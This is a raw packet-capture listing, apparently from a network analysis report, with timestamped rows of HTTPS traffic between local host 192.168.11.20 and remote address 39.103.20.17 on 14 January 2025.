                                                                        Jan 14, 2025 05:11:07.829361916 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.831432104 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.831640005 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.835804939 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.836019039 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.836052895 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.836374998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.838494062 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.838677883 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.842628002 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.842880964 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.842916012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.843154907 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.845110893 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.845300913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.847338915 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.847563028 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.847563028 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.851610899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.851833105 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.856216908 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.856441975 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.858458042 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.858668089 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.861332893 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.861545086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.861573935 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.862149954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.865335941 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.865845919 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.867824078 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.868035078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.868035078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.872150898 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.872360945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.874527931 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.874773026 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.874810934 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.875113010 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.876801968 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.877034903 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.881323099 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.881575108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.881575108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.883760929 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.883910894 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.888086081 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.888292074 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.888329983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.888595104 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.896481991 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.896667004 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.897417068 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.897674084 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.897711039 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.898047924 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.900777102 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.900959015 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.902825117 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.903084040 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.903125048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.903493881 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.906065941 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.906388998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.907809973 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.908277988 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.908277988 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.909976006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.910211086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.913180113 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.913394928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.913394928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.916733980 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.916944027 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.918533087 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.918915987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.918948889 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.919118881 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.920527935 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.920876026 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.923801899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.924313068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.925615072 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.925818920 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.929107904 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.929384947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.929419041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.929578066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.930905104 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.931117058 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.933032036 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.933516979 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.933552027 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.933712959 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.936261892 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.936875105 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.938348055 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.938818932 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.941736937 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.941968918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.943346977 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.943572044 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.943605900 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.943844080 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.945475101 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.945677042 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.948790073 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.949022055 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.949055910 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.949296951 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.950723886 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.951083899 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.954067945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.954360008 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.955813885 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.956054926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.959330082 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.959564924 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.959597111 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.959938049 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.961066008 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.961421013 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.963155031 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.963743925 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.966715097 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.966948986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.968395948 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.968727112 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.968736887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.968966007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.971764088 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.971966028 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.973457098 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.973803043 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.975357056 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.975660086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.978909016 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.979135990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.981719971 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.981955051 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.984344006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.984571934 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.984606028 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.985344887 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.985972881 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.986485958 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.988027096 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.988801003 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.991563082 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.991787910 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.993361950 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.993596077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.993629932 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.993876934 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.996678114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.996891975 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.998343945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:07.998508930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:07.998689890 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.000475883 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.000966072 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.003923893 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.004381895 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.004381895 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.007200956 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.007384062 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.008925915 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.009167910 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.009202003 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.009440899 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.010812998 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.011015892 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.014286995 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.014518976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.014518976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.016232014 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.016501904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.019663095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.020235062 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.021589994 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.021819115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.023358107 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.023575068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.023756981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.026685953 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.026947021 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.028642893 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.028887987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.028922081 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.029165030 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.032011032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.032401085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.033857107 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.034274101 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.034306049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.034898043 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.035849094 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.036075115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.039122105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.039290905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.039472103 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.042649031 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.042887926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.044548988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.044789076 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.044821024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.045066118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.046403885 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.046634912 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.050052881 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.050299883 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.050332069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.050582886 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.051621914 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.051831007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.053056002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.055175066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.055386066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.055386066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.057269096 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.057463884 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.058954954 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.059200048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.059236050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.059495926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.062278032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.062505960 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.064152956 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.064471960 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.067594051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.067831993 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.069472075 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.069672108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.069672108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.071278095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.071551085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.074521065 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.075351954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.076349974 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.076697111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.079708099 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.080243111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.081676960 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.081979990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.083372116 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.083623886 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.083661079 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.083920002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.086472988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.086697102 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.088200092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.088444948 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.088479996 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.088736057 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.091819048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.092041969 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.093556881 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.093775034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.096698046 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.097378016 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.098423004 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.098808050 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.100074053 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.100837946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.103463888 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.103692055 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.103693008 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.105267048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.105498075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.108273983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.108522892 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.108522892 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.109999895 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.110203981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.111484051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.111716986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.111748934 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.111993074 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.115142107 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.115719080 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.116569996 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.116976976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.117012024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.117362976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.119424105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.119688988 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.121011019 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.121660948 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.121692896 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.122061014 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.123358011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.123570919 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.125909090 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.126151085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.126151085 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.128807068 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.129024982 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.130300045 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.130564928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.131822109 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.132065058 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.134814024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.135041952 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.135078907 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.136578083 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.136893034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.139544010 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.140069962 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.141103983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.141336918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.142592907 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.142827034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.143022060 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.145351887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.145740032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.147028923 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.147274017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.147274017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.149857998 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.150079012 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.151437044 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.151683092 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.151683092 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.152826071 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.153115034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.155527115 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.155755997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.156096935 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.158308029 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.158802032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.159801960 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.160638094 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.161434889 CET4434975939.103.20.17192.168.11.20
